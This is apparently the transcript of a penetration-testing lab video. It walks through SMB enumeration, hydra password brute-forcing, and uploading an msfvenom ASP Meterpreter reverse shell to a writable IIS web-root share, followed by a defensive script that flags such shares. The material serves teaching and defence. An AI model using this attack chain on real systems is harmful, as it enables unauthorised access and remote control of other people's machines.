All right. So, if you weren't paying attention in the PowerPoint, now is the time to pay attention, because I'm gonna go over all the tools we just learned about for SMB from the PowerPoint.
So the first thing we're going to use against our target is nmap,
and you'll see I have a different terminal window; I'm using Terminator.
There it is, Terminator.
What I like about this is you can split it vertically, you can split it horizontally.
You don't have to open numerous new terminal windows. I find myself opening many of them. That's not to say you can't
also split this horizontally
and vertically, but I kind of like the layout of Terminator a little bit better.
So for now let's close these windows
and let's run nmap. So I'm gonna use nmap against our target, 192.168.1.231.
The script is smb-enum, um, the SMB enum script, on port 445, and we're making it very, very, very verbose.
And we can see here that it used smb-enum-shares as the guest.
And we can see here if we have anonymous access. We don't to ADMIN$.
We don't to C$. We do have read and write access to IPC$, which
of course we can't look at files and directories with, but maybe we can use EternalBlue, the exploit, if this is vulnerable to it.
We're not gonna do that though, for right now.
Users we can read,
and inetpub we can read. Ultimately we would like to be able to write to a share.
So from here let's use rpcclient, and we'll use a null session, so we're not going to
put anything for the user; we're going to leave it blank.
And I'm just gonna hit enter here
and we can see we're in rpcclient,
so we can do things like the question mark and we can see all the different options we have, and we have a lot here.
So let's say, for example, we want to look at the server info. Maybe it will give us some info. Hopefully.
We can see here we have a little bit of information.
We can see the OS version.
What we can also do is look at our query users,
our RID, relative identifier. And if we were paying attention before... let me, let me clear out this terminal.
Well, it doesn't like that.
In rpcclient, what we can do is queryuser 5000, because RID, or I should say 500, because RID 500 should be the administrator.
And we can see here that it is the administrator account.
So we might be able to brute-force the administrator. Let's try to see who a user is. So we're gonna queryuser 1000, which should be the first user on this machine.
So we see here that the first user is IEUser. And we might be able to brute-force the login for IEUser.
So let's get out of this.
Now let's clear our screen
and let's try to brute-force this IEUser using hydra
and see what permissions we have.
So we'll see here hydra -l (little L), since we already know the user is IEUser. We could make a list of users that we enumerated with -L (big L), and maybe a text file with all the different users. For right now we're just using IEUser.
And I have a custom password list here. You might want to use something like rockyou. I can tell you that the password is in rockyou for this user; it just takes over 40 minutes to find it.
And that's sometimes the trouble with brute-forcing logins:
it can take a very long time depending on what word lists you're using for either a user or a password combination.
Hopefully this doesn't take 40 minutes.
So IEUser's password is this fancy password here.
So from here let's clear this out again
and let's use nmap. I want to show you the difference now that we have an actual username and password.
So I'm gonna run nmap again. We're gonna do --script smb-enum again, but we're using script arguments, so I'm using smbusername, IEUser, smbpassword, again port 445, against this machine here.
And you'll see it gave us a whole lot more information. smb-enum-users: so it gave us all the different users
along with their relative identifiers here. So we found some of the users, sshd; so this machine, we enumerated it before and we found port 22 open, so here there are SSH users.
We see also that we have read and write privileges to inetpub, which is important because we learned that that's the web server, right?
We see that we have smb-enum-sessions, so we're the only one logged in.
Let's keep looking here,
because this is really good information: smb-enum-groups.
So simply adding those arguments in the nmap scripting engine
gave us a whole lot more information, and gosh,
like I said, enumeration is the key, right?
So now that we found this and we see that we can write to inetpub,
let's see if we can put something on that server.
And just going to this web server here, we see this welcome page.
Now, we'll talk about enumerating web servers a little bit later, but I told you guys to install things like Wappalyzer. We can see the web framework is ASP.NET. It's a Windows server. It's using IIS 7.5. We also look at things like cookie values; we see ASP session ID.
So it's definitely using ASP, which, if we're looking at shells,
an ASP shell might be the right thing in this case.
So I'm going to clear our terminal again.
Now, of course I could be splitting terminals for you vertically and horizontally, but I want to make it look clean for the demo. That's why I'm not doing that.
But let's use smbclient.
We can go to the web root.
Now I always like to verify. Now I see a few, you know, hello.asp scripts here.
I just want to make sure that I can write to this directory.
You'll see that. That's right, we're in the web root here, and then we can try to write, um, or create a shell with msfvenom.
We'll talk about shells later. But for now let's go ahead and split this vertically
and let's create an ASP shell with msfvenom.
So see here: msfvenom, our payload is windows/meterpreter/reverse_tcp, our listening host is our machine because we're creating a reverse connection,
our LPORT is 4444, and our format is asp; we're making a shell.asp script.
Okay, so we created that.
I'm going to move this
to the desktop. Like I told you guys before, the tilde is our current user, which is root.
It's already here, already created before, but I just like knowing where it is exactly.
So now what we're going to do is launch the Metasploit Framework, which we'll talk about a lot more later, about shells, but I'm going to execute the Metasploit Framework,
or execute a module, or create a module
within the Metasploit Framework: exploit/multi/handler.
And here I'm just doing a whole bunch of things that I'm executing before I actually start it up, as opposed to starting it up and having to enter each of these individually. I already know what I want to do.
So I'm using exploit/multi/handler. I'm setting the payload as windows/meterpreter/reverse_tcp. And you'll notice it's the same things up above here with msfvenom.
So when I run this, I'm gonna put it in the background; that's why that -j.
And you'll see here it did everything for me, right?
It's making windows/meterpreter/reverse_tcp our payload, LHOST, LPORT.
Now what I want to do is put...
mm, you'll see it didn't like that.
So let's actually call the full path.
So we see that with the full path, it likes that. And we can do dir, ls, and we should see here that our shell.asp file is now in the web root.
What should happen now? We can close this.
Going to shell.asp,
we see that a Meterpreter session was opened,
and if we go to sessions we should see that; here it is.
And to interact with it, we just do sessions 1.
You could use sysinfo,
we drop into our shell,
and we now have a shell on this Windows machine.
So that's looking at the various tools that we talked about in the PowerPoint, or the lecture, I should say, where we looked at nmap, we looked at rpcclient, we looked at smbclient; but that's using all of those to enumerate this machine to ultimately get a shell on it.
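The finding that made the whole chain above possible is a share under the web root that a low-privileged account (or guest) can write to. As an added example, not part of the demo, here is a small triage script that parses the text layout of nmap's smb-enum-shares output and ranks each share by that risk; the sample output is constructed, and the share names and the severity rules are assumptions of this example.

```python
import re
# Constructed sample in the layout of nmap's smb-enum-shares output (not captured from the demo).
SAMPLE = r"""| smb-enum-shares:
|   account_used: ieuser
|   \\192.168.1.231\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.1.231\inetpub:
|     Type: STYPE_DISKTREE
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\192.168.1.231\Users:
|     Type: STYPE_DISKTREE
|     Anonymous access: READ
|     Current user access: READ
"""

SHARE_RE = re.compile(r"^\|\s+\\\\[^\\]+\\([^:]+):\s*$")  # "|   \\host\share:"
FIELD_RE = re.compile(r"^\|\s+([A-Za-z ]+):\s*(.*)$")     # "|     Field: value"
WEBROOT_HINTS = ("inetpub", "wwwroot", "htdocs")          # assumed names of shares holding web content
SEVERITY = ("HIGH", "MEDIUM", "LOW")

def parse_shares(text):
    """Map share name -> {field: value} from the script's text output."""
    shares, current = {}, None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = m.group(1)
            shares[current] = {}
        elif current is not None and (m := FIELD_RE.match(line)):
            shares[current][m.group(1).strip()] = m.group(2).strip()
    return shares

def assess(shares):
    """Return (severity, share, anonymous, user) tuples, worst first. IPC$ is skipped: READ/WRITE there is normal and it holds no files."""
    findings = []
    for name, info in shares.items():
        if info.get("Type", "").startswith("STYPE_IPC"):
            continue
        anon = info.get("Anonymous access", "<none>")
        user = info.get("Current user access", "<none>")
        is_web = any(h in name.lower() for h in WEBROOT_HINTS)
        # HIGH: anyone can drop files, or the account can write into the web root (code execution);
        # MEDIUM: authenticated write elsewhere; LOW: guest can read the share.
        sev = ("HIGH" if "WRITE" in anon or ("WRITE" in user and is_web)
               else "MEDIUM" if "WRITE" in user else "LOW" if anon != "<none>" else None)
        if sev:
            findings.append((sev, name, anon, user))
    return sorted(findings, key=lambda f: (SEVERITY.index(f[0]), f[1]))
```

Run against real output by pasting the smb-enum-shares block into SAMPLE (or reading it from a file); the fix for a HIGH finding on a web-root share is to remove write access for guest and non-admin accounts in the share and NTFS permissions.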